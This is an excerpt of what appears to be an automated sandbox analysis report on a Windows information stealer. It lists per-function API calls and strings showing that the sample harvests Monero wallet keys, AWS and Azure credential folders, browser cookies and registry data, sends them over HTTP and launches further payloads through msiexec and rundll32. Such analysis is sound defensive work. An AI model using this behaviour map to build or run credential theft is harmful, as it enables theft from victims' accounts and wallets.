                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00685A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0142E2F0,00000000,?,0142E670,00000000,?,006A1B4C), ref: 00685EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00685ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00685EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00685EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00685EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00685F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00685F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00686000
                                    • InternetCloseHandle.WININET(00000000), ref: 0068600D
                                    • HttpOpenRequestA.WININET(00000000,0142E280,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 00685C48
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00686017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 37849f6f4dd5315a83af59fc211ece98e1be62d33cb0f826e1475666d82c6092
                                    • Instruction ID: 0c744b0a8c4429c1daba7f9df447b77eafebe220291ff04ddacf24c44210b3cb
                                    • Opcode Fuzzy Hash: 37849f6f4dd5315a83af59fc211ece98e1be62d33cb0f826e1475666d82c6092
                                    • Instruction Fuzzy Hash: EC12EB71924118ABCF55EBE0DCA5FEEB3BEAF14700F00459DB10666591EF306A48CFA9
                                    Function 0068CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0068D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D308
                                    • lstrcat.KERNEL32(?,006A1570), ref: 0068D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D32A
                                    • lstrcat.KERNEL32(?,006A1574), ref: 0068D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D34C
                                    • lstrcat.KERNEL32(?,006A1578), ref: 0068D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D36E
                                    • lstrcat.KERNEL32(?,006A157C), ref: 0068D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D390
                                    • lstrcat.KERNEL32(?,006A1580), ref: 0068D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D3B2
                                    • lstrcat.KERNEL32(?,006A1584), ref: 0068D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068D3D4
                                    • lstrcat.KERNEL32(?,006A1588), ref: 0068D3E3
                                      • Part of subcall function 0069AB30: lstrlen.KERNEL32(00684F55,?,?,00684F55,006A0DDF), ref: 0069AB3B
                                      • Part of subcall function 0069AB30: lstrcpy.KERNEL32(006A0DDF,00000000), ref: 0069AB95
                                    • lstrlen.KERNEL32(?), ref: 0068D42A
                                    • lstrlen.KERNEL32(?), ref: 0068D439
                                      • Part of subcall function 0069AD80: StrCmpCA.SHLWAPI(00000000,006A1568,0068D2A2,006A1568,00000000), ref: 0069AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 4736631fe7441512d035425e008819082ece08931d7c8edf3a30bef5bcdfa54e
                                    • Instruction ID: 5b5e8ba93a6c7b2c780d298d1c9d94211c1482f5f6381cadef59043883e5d36b
                                    • Opcode Fuzzy Hash: 4736631fe7441512d035425e008819082ece08931d7c8edf3a30bef5bcdfa54e
                                    • Instruction Fuzzy Hash: 0DE1F171914108ABCF44EBE0DD96EEEB3BEAF54301F104558F106B65A1DE31AF08DBA9
                                    Function 0068CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0142CA90,00000000,?,006A1544,00000000,?,?), ref: 0068CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CBD9
                                    • StrStrA.SHLWAPI(?,0142CAC0,006A0B56), ref: 0068CBF7
                                    • StrStrA.SHLWAPI(00000000,0142CB80), ref: 0068CC1E
                                    • StrStrA.SHLWAPI(?,0142CF58,00000000,?,006A1550,00000000,?,00000000,00000000,?,01429078,00000000,?,006A154C,00000000,?), ref: 0068CDA2
                                    • StrStrA.SHLWAPI(00000000,0142CE98), ref: 0068CDB9
                                      • Part of subcall function 0068C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C971
                                      • Part of subcall function 0068C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C97C
                                    • StrStrA.SHLWAPI(?,0142CE98,00000000,?,006A1554,00000000,?,00000000,01429008), ref: 0068CE5A
                                    • StrStrA.SHLWAPI(00000000,01428E78), ref: 0068CE71
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B47), ref: 0068CA43
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B4B), ref: 0068CA57
                                      • Part of subcall function 0068C920: lstrcat.KERNEL32(?,006A0B4E), ref: 0068CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0068CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0068CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 5ec4545d02d00ed8b52f0bd8e5b83c21750801beeb2d2764ea66ab91633a69e8
                                    • Instruction ID: 5bb38db3a5222b4633070e3f1bd24aa90d3967b2a3f1f194b29e7cb2935a3123
                                    • Opcode Fuzzy Hash: 5ec4545d02d00ed8b52f0bd8e5b83c21750801beeb2d2764ea66ab91633a69e8
                                    • Instruction Fuzzy Hash: AAE1F771914108ABCF44EBE4DCA2FEEB7BEAF14300F00459DF10667595EE306A49CBA9
                                    Function 006984B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,0142A820,00000000,00020019,00000000,006A05BE), ref: 00698534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006985B6
                                    • wsprintfA.USER32 ref: 006985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0069861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00698629
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: f61b437e31cf100b08587835a4caee3d2ee6ba591458ffcd7a5465bfa63cb2db
                                    • Instruction ID: fdd4ee7a92b1161db71f983ccf59f530ae2fec230bad83548c9bee7595e27624
                                    • Opcode Fuzzy Hash: f61b437e31cf100b08587835a4caee3d2ee6ba591458ffcd7a5465bfa63cb2db
                                    • Instruction Fuzzy Hash: CF811871914218ABDB64DB94CD95FEAB7BDBB08300F1086D8E109A6580DF716B88CFE4
                                    Function 006991A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006991FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: `diF$`diF$image/jpeg
                                    • API String ID: 2244384528-832773058
                                    • Opcode ID: f67e83db3b872083ca36432847c008a359cc203eab321785efde77a08e9031ad
                                    • Instruction ID: cb73d28e24ca90f0f6d27fb264b51e841ead372b611d41560270d37dc91646c3
                                    • Opcode Fuzzy Hash: f67e83db3b872083ca36432847c008a359cc203eab321785efde77a08e9031ad
                                    • Instruction Fuzzy Hash: B871ED71914208ABDF14EFE5EC89FEEB7BDBB48301F108508F516A7290DB34AA05DB61
                                    Function 00694FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00695000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 0069501D
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694B7C
                                      • Part of subcall function 00694B60: FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 0069508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 006950A9
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                      • Part of subcall function 00694B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                      • Part of subcall function 00694B60: FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00695118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00695135
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694C00
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A08D3), ref: 00694C15
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694C32
                                      • Part of subcall function 00694B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00694C6E
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,0142E370), ref: 00694C9A
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,006A0FE0), ref: 00694CAC
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,?), ref: 00694CC0
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,006A0FE4), ref: 00694CD2
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,?), ref: 00694CE6
                                      • Part of subcall function 00694B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00694CFC
                                      • Part of subcall function 00694B60: DeleteFileA.KERNEL32(?), ref: 00694D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: e88630bf1affaf90e21acd3c2ed88a938e10f6bffceded28b0378caaa8628600
                                    • Instruction ID: 3a1aa0fbb309f08010cfa5b72cd106660b815551413ed9bae0534030f6503cd5
                                    • Opcode Fuzzy Hash: e88630bf1affaf90e21acd3c2ed88a938e10f6bffceded28b0378caaa8628600
                                    • Instruction Fuzzy Hash: 2F41B1BA94430867DF50F7B0EC47FED732E5B62701F004558B249664C1EEB4ABC88B96
                                    Function 00693080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00693415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 006935AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0069373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 409a5508aa48e3564cdda0de73fd6649c0eb160d3ecac96f314e8eccb0510267
                                    • Instruction ID: a88e0ee07f2b1989d793366fd9787bbe3fd76d241be92217cc3cad257d0e416f
                                    • Opcode Fuzzy Hash: 409a5508aa48e3564cdda0de73fd6649c0eb160d3ecac96f314e8eccb0510267
                                    • Instruction Fuzzy Hash: 601209719101189ACF58EBE0DDA2FEDB7BEAF14300F00459DE50666596EF302B49CFA9
                                    Function 00689BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00689A50: InternetOpenA.WININET(006A0AF6,00000001,00000000,00000000,00000000), ref: 00689A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00689CAF
                                    • lstrcat.KERNEL32(?,006A12C4), ref: 00689CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00689CD5
                                    • lstrcat.KERNEL32(?,006A12C8), ref: 00689CE7
